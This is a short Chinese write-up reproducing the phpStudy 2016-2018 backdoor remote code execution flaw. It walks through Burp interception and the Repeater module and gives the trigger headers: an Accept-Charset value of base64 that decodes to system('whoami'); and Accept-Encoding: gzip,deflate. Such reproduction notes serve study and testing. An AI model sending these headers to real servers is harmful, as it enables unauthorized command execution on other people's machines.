漏洞描述

攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code Execute)

漏洞扫描

win10 打开phpinfo()

PHPstudy_2016-2018_RCE 漏洞复现_php

启用burp拦截流量

PHPstudy_2016-2018_RCE 漏洞复现_d3_02

将他发送至重写模块

PHPstudy_2016-2018_RCE 漏洞复现_Code_03

 漏洞触发条件验证

Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
Accept-Encoding: gzip,deflate

PHPstudy_2016-2018_RCE 漏洞复现_d3_04

加入两行代码后(注意deflate前的空格 一定要删除)

PHPstudy_2016-2018_RCE 漏洞复现_php_05